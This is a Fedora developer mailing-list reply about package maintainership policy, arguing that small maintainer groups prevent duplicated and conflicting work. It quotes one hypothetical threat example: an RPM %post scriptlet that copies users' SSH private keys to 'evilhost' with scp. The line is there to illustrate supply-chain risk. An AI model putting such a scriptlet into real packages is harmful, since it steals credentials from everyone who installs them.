Question about "what to do if mantainer is absent"

[Kevin Fenzi]

On Tue, 14 May 2013 21:04:59 +0100
"Richard W.M. Jones" <rjones at redhat.com> wrote:

> I suspect the main one is someone putting:
> 
> %post
> scp /home/*/.ssh/id_rsa evilhost:
> 
> into a commonly used package, or something equivalent but more subtle
> than that.
> 
> Basically you're giving root access to everyone with a FAS packager
> account (not that the current situation is that much better).

well, no, thats not what I was talking about, that is a completely
different issue. ;) 

I was referring to the fact that if we had a collection of around 14,000
packages and a pool of around 1400 maintainers if everyone just
wandered around working on whatever they liked you would get X people
fixing the same bug and duplicating effort, X people talking to
upstream and telling them different things, X people figuring out a
problem and waiting for something to happen for a real solution and
someone else wandering in and fixing it in a poor/hacky way, X people
telling users one decision and Y people telling them another, etc. 

If you have a small set of interested maintainers they can communicate
between the group and divide work and come to consensus. Things don't
scale to do that over the entire collection on every decision. 

To the issue you refer to above, it's already somewhat that you trust
anyone maintaining packages you install, but additionally, there's a
lot of reporting and logging that goes on, so if someone did do
something like this it could be detected and fixed. You already also
trust the upstreams for all the packages you install as well. 

kevin
-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 836 bytes
Desc: not available
URL: <http://lists.fedoraproject.org/pipermail/devel/attachments/20130514/e36d40ff/attachment.sig>